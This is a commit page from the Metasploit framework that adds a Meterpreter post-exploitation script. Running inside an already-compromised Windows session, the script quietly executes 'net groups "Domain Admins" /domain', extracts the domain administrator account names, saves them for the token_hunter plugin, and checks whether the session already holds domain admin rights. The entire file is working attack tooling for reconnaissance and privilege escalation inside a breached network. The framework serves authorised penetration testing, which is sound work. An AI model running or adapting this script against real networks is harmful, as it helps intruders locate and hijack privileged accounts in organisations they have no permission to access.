Script for generating Domain Admin Account list for use in token_hunter plugin
git-svn-id: file:///home/svn/framework3/trunk@9125 4d416f70-5f16-0410-b530-b9f4589650daunstable
Carlos Perez
parent
393f7d6b26
commit
4d0d06b1fb
|
|
@ -0,0 +1,83 @@
|
|||
#$Id$
|
||||
#Meterpreter script for generating domain admin list to be used with Token Hunter plugin
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
|
||||
#Verion: 0.1
|
||||
#-------------------------------------------------------------------------------
|
||||
#Options and Option Parsing
|
||||
opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help menu." ]
|
||||
)
|
||||
|
||||
opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
when "-h"
|
||||
print_line "Meterpreter Script for extracting Doamin Admin Account list for use."
|
||||
print_line "in token_hunter plugin and verifies if current account for session is"
|
||||
print_line "is a member of such group."
|
||||
print_line(opts.usage)
|
||||
raise Rex::Script::Completed
|
||||
end
|
||||
}
|
||||
#-------------------------------------------------------------------------------
|
||||
#Set General Variables used in the script
|
||||
@client = client
|
||||
users = ""
|
||||
list = []
|
||||
host = @client.sys.config.sysinfo['Computer']
|
||||
current_user = client.sys.config.getuid.scan(/\S*\\(\S*)/)
|
||||
domain = @client.fs.file.expand_path("%USERDOMAIN%")
|
||||
# Create Filename info to be appended to downloaded files
|
||||
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+"-"+sprintf("%.5d",rand(100000))
|
||||
# Create a directory for the logs
|
||||
logs = ::File.join(Msf::Config.log_directory, 'domain_admins', host + filenameinfo )
|
||||
# Create the log directory
|
||||
::FileUtils.mkdir_p(logs)
|
||||
#logfile name
|
||||
dest = logs + "/" + host + filenameinfo + ".txt"
|
||||
print_status("found users will be saved to #{dest}")
|
||||
#-------------------------------------------------------------------------------
|
||||
# Function for writing results of other functions to a file
|
||||
def filewrt(file2wrt, data2wrt)
|
||||
output = ::File.open(file2wrt, "a")
|
||||
if data2wrt
|
||||
data2wrt.each_line do |d|
|
||||
output.puts(d)
|
||||
end
|
||||
end
|
||||
output.close
|
||||
end
|
||||
################## MAIN ##################
|
||||
#Run net command to enumerate users and verify that it ran successfully
|
||||
cmd = 'net groups "Domain Admins" /domain'
|
||||
r = @client.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
users << d
|
||||
if d=~/System error/
|
||||
print_error("Could not enumerate Domain Admins!")
|
||||
raise Rex::Script::Completed
|
||||
end
|
||||
end
|
||||
#split output in to lines
|
||||
out_lines = users.split("\n")
|
||||
#Select only those lines that have the usernames
|
||||
a_size = (out_lines.length - 8)
|
||||
domadmins = out_lines.slice(6,a_size)
|
||||
#get only the usernames out of those lines
|
||||
domainadmin_user_list = []
|
||||
domadmins.each do |da|
|
||||
da.scan(/(\w*)\b\s/).each do |acc|
|
||||
domainadmin_user_list << acc.join.strip
|
||||
end
|
||||
end
|
||||
#process accounts found
|
||||
print_status("Accounts Found:")
|
||||
domainadmin_user_list.each do |u|
|
||||
print_status("\t#{domain}\\#{u}")
|
||||
filewrt(dest, "#{domain}\\#{u}")
|
||||
list << u
|
||||
end
|
||||
if list.index(current_user.join)
|
||||
print_status("Current sessions running as Domain Admin!!")
|
||||
else
|
||||
print_error("Current session is not running as Domain Admin")
|
||||
end
|
||||
Loading…
Reference in New Issue